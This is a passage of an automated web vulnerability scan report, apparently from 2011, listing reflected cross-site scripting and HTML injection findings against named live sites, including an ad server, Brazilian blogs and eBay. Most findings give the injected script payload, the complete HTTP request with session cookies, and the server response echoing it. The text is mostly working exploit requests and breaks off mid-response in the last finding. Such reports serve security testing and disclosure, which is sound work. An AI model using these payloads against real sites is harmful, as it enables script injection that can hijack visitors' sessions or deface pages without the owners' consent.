2.78. http://b3-uk.mookie1.com/2/www.three.co.uk/CHS/Weeklywrap/0511/1[TIMESTAMP]@x60 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3-uk.mookie1.com
Path:   /2/www.three.co.uk/CHS/Weeklywrap/0511/1[TIMESTAMP]@x60

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9ef3"><script>alert(1)</script>1d437585e4c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/www.three.co.uk/CHS/Weeklywrapd9ef3"><script>alert(1)</script>1d437585e4c/0511/1[TIMESTAMP]@x60? HTTP/1.1
Host: b3-uk.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3-uk.mookie1.com/2/www.Microsoft.com/Three/CHS/Q1/2011/1[TIMESTAMP]@x60?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; id=211111708350353; session=1312375058|1312376498; RMFS=011Qob4tU1051iH; NSC_fo1efm_qppm_iuuq=ffffffff09097b8245525d5f4f58455e445a4a423660; Three_CHS_Wraps_Q1_2011

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:03:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://b3-uk.mookie1.com/5c/www.three.co.uk/CHS/Weeklywrapd9ef3"><script>alert(1)</script>1d437585e4c/0511/1[TIMESTAMP]/1304982041/x60/default/empty.gif/4d686437616b346d3678344144514675?x" target="_top">
...[SNIP]...

2.79. http://b3-uk.mookie1.com/2/www.three.co.uk/CHS/Weeklywrap/0511/1[TIMESTAMP]@x60 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3-uk.mookie1.com
Path:   /2/www.three.co.uk/CHS/Weeklywrap/0511/1[TIMESTAMP]@x60

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8090d"><script>alert(1)</script>483e44ae1ab was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/www.three.co.uk/CHS/Weeklywrap/05118090d"><script>alert(1)</script>483e44ae1ab/1[TIMESTAMP]@x60? HTTP/1.1
Host: b3-uk.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3-uk.mookie1.com/2/www.Microsoft.com/Three/CHS/Q1/2011/1[TIMESTAMP]@x60?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; id=211111708350353; session=1312375058|1312376498; RMFS=011Qob4tU1051iH; NSC_fo1efm_qppm_iuuq=ffffffff09097b8245525d5f4f58455e445a4a423660; Three_CHS_Wraps_Q1_2011

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:03:09 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://b3-uk.mookie1.com/5c/www.three.co.uk/CHS/Weeklywrap/05118090d"><script>alert(1)</script>483e44ae1ab/1[TIMESTAMP]/1087897542/x60/default/empty.gif/4d686437616b346d3678344144514675?x" target="_top">
...[SNIP]...

2.80. http://b3-uk.mookie1.com/2/www.three.co.uk/CHS/Weeklywrap/0511/1[TIMESTAMP]@x60 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3-uk.mookie1.com
Path:   /2/www.three.co.uk/CHS/Weeklywrap/0511/1[TIMESTAMP]@x60

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 298bd"><script>alert(1)</script>1e0c6d978bf was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/www.three.co.uk/CHS/Weeklywrap/0511/1[TIMESTAMP]@x60298bd"><script>alert(1)</script>1e0c6d978bf? HTTP/1.1
Host: b3-uk.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3-uk.mookie1.com/2/www.Microsoft.com/Three/CHS/Q1/2011/1[TIMESTAMP]@x60?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; id=211111708350353; session=1312375058|1312376498; RMFS=011Qob4tU1051iH; NSC_fo1efm_qppm_iuuq=ffffffff09097b8245525d5f4f58455e445a4a423660; Three_CHS_Wraps_Q1_2011

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:03:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 318
Content-Type: text/html

<A HREF="http://b3-uk.mookie1.com/5c/www.three.co.uk/CHS/Weeklywrap/0511/1[TIMESTAMP]/1927871876/x60298bd"><script>alert(1)</script>1e0c6d978bf/default/empty.gif/4d686437616b346d3678344144514675?x" target="_top">
...[SNIP]...

2.81. http://blog.bolsademulher.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://blog.bolsademulher.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c7798<a>d4c0d4c265d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.icoc7798<a>d4c0d4c265d HTTP/1.1
Host: blog.bolsademulher.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SID=qqvipoi2pmmm1uncngsj2nc193; bdm_unique=3232235620131237150859; Sample=59; scorecardresearch=636527389-569961966-1312371619292

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 11:42:23 GMT
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
X-Server: webhead-01
Content-Length: 1093
Via: nginx

<h1>Fatal Error</h1> If your blog does not display, please contact the owner of this site.<br /><br />If you are the owner of this site please check that MySQL is running properly and all tables are e
...[SNIP]...
<em>blog.bolsademulher.com/favicon.icoc7798<a>d4c0d4c265d/</em>
...[SNIP]...

2.82. http://blog.bolsademulher.com/movimentorosa/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://blog.bolsademulher.com
Path:   /movimentorosa/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8ac0f<a>981d036f50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /movimentorosa8ac0f<a>981d036f50/ HTTP/1.1
Host: blog.bolsademulher.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://msn.bolsademulher.com/mundomelhor/ecologia-para-vestir-107388.html
Cookie: SID=qqvipoi2pmmm1uncngsj2nc193; bdm_unique=3232235620131237150859; Sample=59

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 11:43:21 GMT
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
X-Server: webhead-01
Content-Length: 1094
Via: nginx

<h1>Fatal Error</h1> If your blog does not display, please contact the owner of this site.<br /><br />If you are the owner of this site please check that MySQL is running properly and all tables are e
...[SNIP]...
<em>blog.bolsademulher.com/movimentorosa8ac0f<a>981d036f50/</em>
...[SNIP]...

2.83. http://camarimmsn.com.br/wp-content/plugins/gd-star-rating/css/gdsr.css.php [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://camarimmsn.com.br
Path:   /wp-content/plugins/gd-star-rating/css/gdsr.css.php

Issue detail

The value of the s request parameter is copied into the HTML document as plain text between tags. The payload a22da<script>alert(1)</script>cb5282e3245 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/gd-star-rating/css/gdsr.css.php?t=1297705057&s=a05i05m20k20c05r05%23121620243046%23121620243240%23s1pchristmas%23s1pcrystal%23s1pdarkness%23s1poxygen%23s1goxygen_gif%23s1pplain%23s1ppumpkin%23s1psoft%23s1pstarrating%23s1pstarscape%23t1pclassical%23t1pstarrating%23t1gstarrating_gif%23lsgflowera22da<script>alert(1)</script>cb5282e3245&o=off&ver=1.9.7 HTTP/1.1
Host: camarimmsn.com.br
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://camarimmsn.com.br/
Cookie: 212f3d1e6b4e00f7257cdf7f3cc5448d=rc8no75ue463js485dl6bat1t3

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 11:44:16 GMT
Server: Apache
Cache-control: must-revalidate
Expires: Wed, 10 Aug 2011 11:44:16 GMT
Last-Modified: Mon, 14 Feb 2011 17:37:37 GMT
Etag: 9629f1f16012a00871a99a408dd81985
Vary: Accept-Encoding
Content-Length: 49063
Connection: close
Content-Type: text/css

/* stars sizes: 12, 16, 20, 24, 30, 46 */
/* stars sets: christmas, crystal, darkness, oxygen, oxygen_gif, plain, pumpkin, soft, starrating, starscape */
/* thumbs sizes: 12, 16, 20, 24, 32, 40 */
/* thumbs sets: classical, starrating, starrating_gif */
/* loaders: flowera22da<script>alert(1)</script>cb5282e3245 */

.starsbar.gdsr-size-12, .starsbar.gdsr-size-12 .gdheight, .starsbar.gdsr-size-12 a { height: 12px; }
.starsbar.gdsr-size-12 a.s1 { width: 12px; }
.starsbar.gdsr-size-12 a.s2 { width: 24px; }

...[SNIP]...

2.84. http://camarimmsn.com.br/wp-content/themes/msn-theme/sendMail.php [http://camarimmsn.com.br/index.php/destaques/look-da-semana-de-a-volta-por-cima-2/ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://camarimmsn.com.br
Path:   /wp-content/themes/msn-theme/sendMail.php

Issue detail

The value of the http://camarimmsn.com.br/index.php/destaques/look-da-semana-de-a-volta-por-cima-2/ request parameter is copied into the HTML document as plain text between tags. The payload 85aa3<script>alert(1)</script>530916da0b8 was submitted in the http://camarimmsn.com.br/index.php/destaques/look-da-semana-de-a-volta-por-cima-2/ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/msn-theme/sendMail.php?http://camarimmsn.com.br/index.php/destaques/look-da-semana-de-a-volta-por-cima-2/85aa3<script>alert(1)</script>530916da0b8 HTTP/1.1
Host: camarimmsn.com.br
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://camarimmsn.com.br/
Cookie: 212f3d1e6b4e00f7257cdf7f3cc5448d=rc8no75ue463js485dl6bat1t3

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 11:44:49 GMT
Server: Apache
Content-Length: 1205
Connection: close
Content-Type: text/html

<form id="form1" name="form1" method="post" action="tks.php">
<p style="color: #444444;margin-top:5px;padding-top:5px;font-family: 'Lucida Sans', Lucida, Arial;font-size: 14px;">
<label for="who
...[SNIP]...
ea name="mensagem" id="mensagem" cols="35" rows="5">Estava lendo esta mat..ria, e gostaria de compartilhar com voc..:

http://camarimmsn.com.br/index.php/destaques/look-da-semana-de-a-volta-por-cima-2/85aa3<script>alert(1)</script>530916da0b8</textarea>
...[SNIP]...

2.85. http://camarimmsn.com.br/wp-content/themes/msn-theme/sendMail.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://camarimmsn.com.br
Path:   /wp-content/themes/msn-theme/sendMail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f863b<script>alert(1)</script>050e92f0818 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/msn-theme/sendMail.php?http://camarimmsn.com.br/index.php/destaques/look-da-semana-de-a-volta-por-cima-2/&f863b<script>alert(1)</script>050e92f0818=1 HTTP/1.1
Host: camarimmsn.com.br
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://camarimmsn.com.br/
Cookie: 212f3d1e6b4e00f7257cdf7f3cc5448d=rc8no75ue463js485dl6bat1t3

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 11:44:50 GMT
Server: Apache
Content-Length: 1208
Connection: close
Content-Type: text/html

<form id="form1" name="form1" method="post" action="tks.php">
<p style="color: #444444;margin-top:5px;padding-top:5px;font-family: 'Lucida Sans', Lucida, Arial;font-size: 14px;">
<label for="who
...[SNIP]...
a name="mensagem" id="mensagem" cols="35" rows="5">Estava lendo esta mat..ria, e gostaria de compartilhar com voc..:

http://camarimmsn.com.br/index.php/destaques/look-da-semana-de-a-volta-por-cima-2/&f863b<script>alert(1)</script>050e92f0818=1</textarea>
...[SNIP]...

2.86. http://cgi1.ebay.com/ebaymotors/ws/eBayISAPI.dll [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgi1.ebay.com
Path:   /ebaymotors/ws/eBayISAPI.dll

Issue detail

The value of the cb request parameter is copied into the XML document as plain text between tags. The payload a0ee5<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>29bac9477af was submitted in the cb parameter. This input was echoed as a0ee5<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>29bac9477af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /ebaymotors/ws/eBayISAPI.dll?GlobalHeaderAjax&vnlmenu=true&catid=6000&pageid=1&cb=vjo.darwin.globalnav.util.VNLMenu.callFna0ee5<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>29bac9477af HTTP/1.1
Host: cgi1.ebay.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cgi.ebay.com/ebaymotors/Cafe-seat-Yamaha-Honda-Kawasaki-Suzuki-XS-CB-KZ-GS-_W0QQcmdZViewItemQQhashZitem2565b50295QQitemZ160620151445QQptZMotorcyclesQ5fPartsQ5fAccessories
Cookie: npii=btrm/svid%3D97986747002501acd82^cguid/8fb2381d1310a0aa178150b1ff970218501acd82^tguid/8ff75dea1310a02652f7f297ffe4464f501acd82^; dp1=bvrvi/1%7C0%7C160620151445%7C4e46c8ed^pbf/%23200000000040000000501acd6d^tzo/12c51fc4800^u1p/QEBfX0BAX19AQA**501acd6d^idm/14e3aa75f^; nonsession=CgAAIAB5OYSbtMTMxMjM5NzgwMngxNjA2MjAxNTE0NDV4MTAweDJZAMoAIFefm204ZmY3NWRlYTEzMTBhMDI2NTJmN2YyOTdmZmU0NDY0ZgDLAAFOOaD1NQFMABhQGs1tNGUzOTk5ZWQuMC4xLjYuMTI3LjQuMC4yvVgJsQ**; lucky9=3499920; ebay=%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5Esbf%3D%2310000100000%5Ecos%3D5%5Epsi%3DAATsXWM0*%5Edv%3D4e399a02%5E; cssg=9100a0391310a02652f7f297ffe07476; s=CgAD4ACBOOuttOTEwMGEwMzkxMzEwYTAyNjUyZjdmMjk3ZmZlMDc0NzYA7gBzTjrrbTMGaHR0cDovL3Nob3AuZWJheS5jb20vaS5odG1sP19mcm9tPVI0MCZfdHJrc2lkPXA1MTk3Lm01NzAubDEzMTMmX25rdz14c3MmX3NhY2F0PVNlZS1BbGwtQ2F0ZWdvcmllcyNpdGVtMjU2NWI1MDI5NQcBSgAXTjrrbTRlMzk5OWVkLjAuMS42LjY5LjUuMC4yReiLaQ**; ds2=alss/0.xss4e3aeb6d^sotr/b13qzzzzzzzz^ssts/1312397831291^; ns1=BAQAAATFel0oSAAaAANgATFAazW1jNzJ8NjAxXjEzMTIzOTc3ODE3NTheXjFeM3wyfDY1fDV8NHw3XjFeMl40XjNeMTJeMTJeMl4xXjFeMF4xXjBeMV42NDQyNDU5MDc122q3SiYHVd8zi7wezpKLsawfnCM*

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/xml;charset=utf-8
Content-Length: 20681
Date: Wed, 03 Aug 2011 18:58:15 GMT

vjo.darwin.globalnav.util.VNLMenu.callFna0ee5<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>29bac9477af({gh_vnl_0:"<table cellpadding=\"0\" cellspacing=\"0\" class=\"vnl-dn\">
...[SNIP]...

2.87. http://de17a.com/a/41565.iframe [c?url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://de17a.com
Path:   /a/41565.iframe

Issue detail

The value of the c?url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bee19"><script>alert(1)</script>7e3f5c1ce7b was submitted in the c?url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a/41565.iframe;c?url=http://clk.atdmt.com/go/msnnkmse001728x90Xseeph10000002pps/direct;ai.181044531.229288424;ct.1/01?href=http://de17a.com/a/41565.clickbee19"><script>alert(1)</script>7e3f5c1ce7b HTTP/1.1
Host: de17a.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/PPS/iview/msnnkmse001728x90Xseeph10000002pps/direct/01
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cc=1.1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 02 Aug 2011 18:56:45 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: d0="1.AbN%2FBJUBAaN%2Bk30BwwEEXaIDBAHICgY1SDhOC5OCgwGjfpN9AcMBCAIAVVMDBmp7FzIEBjVIOE4FCAgAAADCwgAAGEKFBJUBAaN%2Bk30BkwECg8s%3D";Path=/;Domain=.de17a.com;Expires=Wed, 07-Aug-2030 05:36:45 GMT
Set-Cookie: d3="1.AZOGswGjfpN9AZMBApMB0wEIAgBVUwMGansXMgQGMEg4TgUICAAAAMLCAAAYQgaTOA%3D%3D";Path=/;Domain=.de17a.com;Expires=Wed, 07-Aug-2030 05:36:45 GMT
Set-Cookie: d4="1.AZOBBMIKAaN%2Bk30BwwGTAwGjf5OTf4OTBAgQADIwMTEtMDgtMDIgMjA6NTUFAvODg4ODg4OTeg%3D%3D";Path=/;Domain=.de17a.com;Expires=Wed, 07-Aug-2030 05:36:45 GMT
Set-Cookie: t599410206=1.AbOGswGjfpN9AZMBApMB0wEIAgBVUwMGansXMgQGMEg4TgUICAAAAMLCAAAYQgaTgoMBo36TfQHDAQgCAFVTAwZqexcyBAZtSDhOBQgIAAAAwsIAABhChQSVAQGjfpN9AZMBAoMo;Path=/;Domain=.de17a.com;Expires=Wed, 07-Aug-2030 05:36:45 GMT
Set-Cookie: t288398814=;Path=/;Domain=.de17a.com;Expires=Thu, 01-Jan-1970 00:00:00 GMT
P3P: CP="NON CURa ADMa DEVa TAIa OUR STP IND UNI COM NAV"
Content-Length: 2745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
   <style>

...[SNIP]...
<a href="http://clk.atdmt.com/go/msnnkmse001728x90Xseeph10000002pps/direct;ai.181044531.229288424;ct.1/01?href=http://de17a.com/a/41565/51201.clickbee19"><script>alert(1)</script>7e3f5c1ce7b" target="_blank">
...[SNIP]...

2.88. http://de17a.com/a/41565.iframe [c?url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://de17a.com
Path:   /a/41565.iframe

Issue detail

The value of the c?url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93d52"-alert(1)-"3853defa198 was submitted in the c?url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/41565.iframe;c?url=http://clk.atdmt.com/go/msnnkmse001728x90Xseeph10000002pps/direct;ai.181044531.229288424;ct.1/01?href=http://de17a.com/a/41565.click93d52"-alert(1)-"3853defa198 HTTP/1.1
Host: de17a.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/PPS/iview/msnnkmse001728x90Xseeph10000002pps/direct/01
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cc=1.1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 02 Aug 2011 18:56:48 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: d0="1.AbN%2FBJUBAaN%2Bk30BwwEEXaIDBAHICgY1SDhOC5OCgwGjfpN9AcMBCAIAVVMDBmp7FzIEBjVIOE4FCAgAAADCwgAAGEKFBJUBAaN%2Bk30BkwECg8s%3D";Path=/;Domain=.de17a.com;Expires=Wed, 07-Aug-2030 05:36:48 GMT
Set-Cookie: d3="1.AZOGswGjfpN9AZMBApMB0wEIAgBVUwMGansXMgQGMEg4TgUICAAAAMLCAAAYQgaTOA%3D%3D";Path=/;Domain=.de17a.com;Expires=Wed, 07-Aug-2030 05:36:48 GMT
Set-Cookie: d4="1.AZOBBMIKAaN%2Bk30BwwGTAwGjf5OTf4OTBAgQADIwMTEtMDgtMDIgMjA6NTUFAvODg4ODg4OTeg%3D%3D";Path=/;Domain=.de17a.com;Expires=Wed, 07-Aug-2030 05:36:48 GMT
Set-Cookie: t201484960=1.AbOGswGjfpN9AZMBApMB0wEIAgBVUwMGansXMgQGMEg4TgUICAAAAMLCAAAYQgaTgoMBo36TfQHDAQgCAFVTAwZqexcyBAZwSDhOBQgIAAAAwsIAABhChQSVAQGjfpN9AZMBAoNW;Path=/;Domain=.de17a.com;Expires=Wed, 07-Aug-2030 05:36:48 GMT
Set-Cookie: t288398814=;Path=/;Domain=.de17a.com;Expires=Thu, 01-Jan-1970 00:00:00 GMT
P3P: CP="NON CURa ADMa DEVa TAIa OUR STP IND UNI COM NAV"
Content-Length: 2686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
   <style>

...[SNIP]...
redVersion: 8, width: 728, height: 90, variables: { clickTag: "http://clk.atdmt.com/go/msnnkmse001728x90Xseeph10000002pps/direct;ai.181044531.229288424;ct.1/01?href=http://de17a.com/a/41565/51201.click93d52"-alert(1)-"3853defa198", clickTAG: "http://clk.atdmt.com/go/msnnkmse001728x90Xseeph10000002pps/direct;ai.181044531.229288424;ct.1/01?href=http://de17a.com/a/41565/51201.click93d52"-alert(1)-"3853defa198", actionTag: "http:/
...[SNIP]...

2.89. http://de17a.com/a/41565.iframe [c?url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://de17a.com
Path:   /a/41565.iframe

Issue detail

The value of the c?url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c46a'-alert(1)-'726db27dea2 was submitted in the c?url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/41565.iframe;c?url=http://clk.atdmt.com/go/msnnkmse001728x90Xseeph10000002pps/direct;ai.181044531.229288424;ct.1/01?href=http://de17a.com/a/41565.click6c46a'-alert(1)-'726db27dea2 HTTP/1.1
Host: de17a.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/PPS/iview/msnnkmse001728x90Xseeph10000002pps/direct/01
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cc=1.1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 02 Aug 2011 18:56:50 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
